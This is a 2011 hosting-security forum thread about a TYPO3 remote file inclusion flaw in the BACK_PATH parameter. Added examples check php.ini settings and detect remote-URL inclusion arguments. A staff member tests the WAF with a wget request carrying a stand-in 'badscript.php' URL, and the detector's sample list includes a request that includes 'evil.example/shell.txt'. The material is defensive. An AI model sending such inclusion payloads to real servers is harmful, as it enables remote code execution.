Atomic Secure Linux
 Post subject: typo3 hole. does zero-day protection cover this already?
Unread postPosted: Fri Dec 23, 2011 4:26 am 
Forum Regular

Joined: Sat Mar 28, 2009 6:58 pm
Posts: 802
Location: Germany
The TYPO3 developer team has warned that a critical hole in the TYPO3 Content Management System (CMS) potentially allows attackers to compromise a server. Insufficient checking of the AbstractController.php file's BACK_PATH parameter enables attackers to upload and execute arbitrary PHP scripts (Remote File Inclusion). The developers have been informed that attackers are already trying to intrude into users' servers on a large scale.

TYPO3 versions 4.5.0 to 4.5.8 as well as 4.6.0 and 4.6.1 are vulnerable – but only if the register_globals, allow_url_include and allow_url_fopen PHP variables are set. Only the last of these is enabled by default. Administrators should ensure that at least one of the three options is disabled. The developer team has provided a patch and released the corrected versions 4.5.9 and 4.6.2. Alternatively, users can implement a mod_security rule as described in the developers' advisory.

SOURCE:
http://www.h-online.com/open/news/item/ ... 97861.html
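The advisory quoted above makes the hole conditional on three php.ini directives all being on. The script below, an added example that is not TYPO3 or Atomicorp code, parses a php.ini and reports whether that precondition set is fully enabled; it assumes PHP's stock defaults for absent directives (register_globals and allow_url_include off, allow_url_fopen on) and the php.ini excerpts at the bottom are constructed.

```python
# Added example (not TYPO3 or Atomicorp code): decide from a php.ini whether
# the three PHP settings the advisory names are all on, which is the only
# configuration in which the BACK_PATH remote file inclusion is reachable.
# The php.ini excerpts at the bottom are constructed for illustration.

# Built-in PHP defaults used when a directive is absent from php.ini.
# allow_url_include only exists from PHP 5.2.0; a missing directive is
# treated as Off here, consistent with the advisory's "only the last of
# these is enabled by default".
DEFAULTS = {
    "register_globals": False,
    "allow_url_include": False,
    "allow_url_fopen": True,
}

_TRUE = {"1", "on", "true", "yes"}
_FALSE = {"0", "off", "false", "no", "none", ""}


def parse_php_bool(value):
    """Interpret a php.ini boolean the way PHP does (case-insensitive)."""
    v = value.strip().strip('"').lower()
    if v in _TRUE:
        return True
    if v in _FALSE:
        return False
    raise ValueError("unrecognised php.ini boolean: %r" % value)


def parse_php_ini(text):
    """Return {directive: raw value}; ';' comments, blank lines and [Section]
    headers are skipped, and a later duplicate overrides an earlier one."""
    settings = {}
    for line in text.splitlines():
        line = line.split(";", 1)[0].strip()
        if not line or line.startswith("["):
            continue
        key, sep, value = line.partition("=")
        if sep:
            settings[key.strip().lower()] = value.strip()
    return settings


def rfi_preconditions(ini_text):
    """Effective on/off state of the three directives, defaults applied."""
    settings = parse_php_ini(ini_text)
    return {
        name: parse_php_bool(settings[name]) if name in settings else default
        for name, default in DEFAULTS.items()
    }


def typo3_rfi_exposed(ini_text):
    """True only when all three are on; turning any one off closes the path."""
    return all(rfi_preconditions(ini_text).values())


# Constructed php.ini excerpts.
VULNERABLE_INI = """
[PHP]
register_globals = On        ; needed by an old script, never a good idea
allow_url_fopen = On
allow_url_include = On
"""

HARDENED_INI = """
[PHP]
register_globals = Off
allow_url_include = Off
allow_url_fopen = On         ; left on, as some TYPO3 customers ask for
"""

if __name__ == "__main__":
    for label, ini in (("stock defaults", ""),
                       ("vulnerable", VULNERABLE_INI),
                       ("hardened", HARDENED_INI)):
        print(label, rfi_preconditions(ini), "exposed:", typo3_rfi_exposed(ini))
```

The file is not the whole story under mod_php: `php_flag` / `php_admin_flag` lines in httpd.conf or .htaccess can change these per directory, so confirm the effective values from the interpreter that actually serves the site, for example with `php -r 'var_dump(ini_get("register_globals"), ini_get("allow_url_include"), ini_get("allow_url_fopen"));'` or a phpinfo() page under the vhost in question.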


 Post subject: Re: typo3 hole. does zero-day protection cover this already?
Unread postPosted: Sat Dec 24, 2011 10:24 am 
Long Time Forum Regular

Joined: Thu Dec 09, 2004 11:19 am
Posts: 1843
Well, allow_url_include is a new one on me. It isn't in my php.ini. Maybe something in a newer version of php (5.2+?)

But remote url inclusion would be prevented at least at two levels generally:
Suhosin would prevent it by default if you have it installed.
Various ASL mod_sec rules prevent remote url inclusions
And if there isn't already, there will be a specific ASL mod_sec rule to catch this specific Typo3 issue shortly.

As an aside, on the two Typo3 installs we had (both now gone), both customers wanted us to enable allow_url_fopen (which is normally disabled on our systems and which ASL flags as a vulnerability otherwise)

Register_globals is a pain in the bum and always has been. It is one of the most dangerous php features. Unfortunately it is needed by a number of older scripts. These are, thankfully, almost extinct now.

_________________
--------------------------------
<advert>
If you want to rent a UK-based VPS that comes with friendly advice and support from a fellow ART fan, please get in touch.
</advert>


 Post subject: Re: typo3 hole. does zero-day protection cover this already?
Unread postPosted: Sat Dec 24, 2011 10:28 am 
Atomicorp Staff - Site Admin

Joined: Thu Feb 07, 2008 7:49 pm
Posts: 3242
Location: Chantilly, VA
Yes, ASL already protects you from this entire class of vulnerabilities:

[root@asl-modsec-test ~]# wget localhost/whatever.php?BACK_PATH=http://www.example.com/badscript.php
--2011-12-24 09:28:54-- http://localhost/whatever.php?BACK_PATH ... script.php
Resolving localhost... 127.0.0.1
Connecting to localhost|127.0.0.1|:80... connected.
HTTP request sent, awaiting response... 403 Forbidden
2011-12-24 09:28:54 ERROR 403: Forbidden.

[modsecurity] [client 127.0.0.1] [domain localhost] [403] [/20111224/20111224-0927/20111224-092714-VHgvyMCoAfkAAHWhc@gAAAAD] [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "486"] [id "340162"] [rev "257"] [msg "Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)"] [data "http:/"] [severity "CRITICAL"] Access denied with code 403 (phase 2). Match of "beginsWith http:/%{SERVER_NAME}/" against "MATCHED_VAR" required.

So it doesn't matter if you have any of these functions enabled or not, the attack is blocked regardless.

_________________
Michael Shinn
Atomicorp - Security For Everyone

Co-Author of Troubleshooting Linux Firewalls.
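The log line in the post above shows the WAF matching on an argument value that starts with `http:/`, with an exception for URLs pointing back at the server's own name. The script below is an added example of that class of check written in Python, not the ASL rule 340162 and not Atomicorp's code. It assumes that any query argument whose value carries a network scheme (http, https, ftp, ftps) is an inclusion attempt unless its host equals the configured server name; the sample request targets are constructed, the first one being the wget test from the post.

```python
# Added example (not the ASL rule 340162 and not Atomicorp code): the kind
# of check behind a "Remote File Injection attempt in ARGS" match, run over
# a raw request target.  Assumption: a query argument whose value is a URL
# with a network scheme is an inclusion attempt unless its host is this
# server's own name.  The sample requests are constructed.
import re
from urllib.parse import parse_qsl, urlsplit

# Schemes PHP's URL wrappers fetch over the network when allow_url_fopen /
# allow_url_include are on.  data: and php://input are also gated by
# allow_url_include but are not remote, so they are left to another check.
REMOTE_SCHEMES = ("http", "https", "ftp", "ftps")
_SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.-]*):/+")


def remote_inclusion_args(request_target, server_name):
    """Return [(arg, decoded value)] for every query argument that points at
    a remote URL.  parse_qsl percent-decodes, so %48%54%54%50:// and HTTP://
    normalise to http:// before the scheme is compared, much as a WAF's
    urlDecode and lowercase transforms would."""
    query = urlsplit(request_target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        v = value.strip().lower()
        m = _SCHEME_RE.match(v)
        if not m or m.group(1) not in REMOTE_SCHEMES:
            continue
        try:
            host = urlsplit(v).hostname or ""
        except ValueError:
            host = ""          # malformed netloc (e.g. bad IPv6 literal): treat as hostile
        if host == server_name.lower():
            continue           # points back at ourselves: allowed, like the rule's exception
        hits.append((name, value))
    return hits


def should_block(request_target, server_name):
    """403 decision for one request target."""
    return bool(remote_inclusion_args(request_target, server_name))


# Constructed request targets; the first is the one from the wget test.
SAMPLE_REQUESTS = [
    "/whatever.php?BACK_PATH=http://www.example.com/badscript.php",
    "/whatever.php?BACK_PATH=%48%54%54%50://www.example.com/x.php",
    "/whatever.php?BACK_PATH=http://localhost/typo3/",
    "/index.php?id=42&ref=https://evil.example/shell.txt%3F",
    "/index.php?id=42&q=search+for+http",
]

if __name__ == "__main__":
    for target in SAMPLE_REQUESTS:
        verdict = "403" if should_block(target, "localhost") else "200"
        print(verdict, target, remote_inclusion_args(target, "localhost"))
```

Two caveats when comparing this to a real deployment: the log line above is a phase 2 match, so ModSecurity's ARGS covers POST bodies as well as the query string, which this script does not parse; and a scheme check only catches the remote flavour, so a local traversal in the same parameter (`BACK_PATH=../../...`) needs a separate rule.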


 Post subject: Re: typo3 hole. does zero-day protection cover this already?
Unread postPosted: Sat Dec 24, 2011 1:03 pm 
Long Time Forum Regular

Joined: Sat Aug 20, 2005 9:30 am
Posts: 2812
Location: The Netherlands
faris wrote:
Well, allow_url_include is a new one on me. It isn't in my php.ini. Maybe something in a newer version of php (5.2+?)


The allow_url_include setting was introduced in PHP 5.2.0 according to http://php.net/manual/en/filesystem.configuration.php

_________________
Lemonbit Internet Dedicated Server Management


 Post subject: Re: typo3 hole. does zero-day protection cover this already?
Unread postPosted: Sat Dec 24, 2011 4:44 pm 
Long Time Forum Regular

Joined: Thu Dec 09, 2004 11:19 am
Posts: 1843
Thanks Breun!

Vrolijk Kerstfeest en een Gelukkig Nieuwjaar! (Merry Christmas and a Happy New Year!)
(Or: "Nadolig Llawen a Blwyddyn Newydd Dda" in one of my languages)



 Post subject: Re: typo3 hole. does zero-day protection cover this already?
Unread postPosted: Sat Dec 24, 2011 7:33 pm 
Forum Regular

Joined: Sat Mar 28, 2009 6:58 pm
Posts: 802
Location: Germany
Thanks everybody.
Great that ASL covers this already, like always. :)

I wish a Merry Christmas to the Atomicorp team and all members.

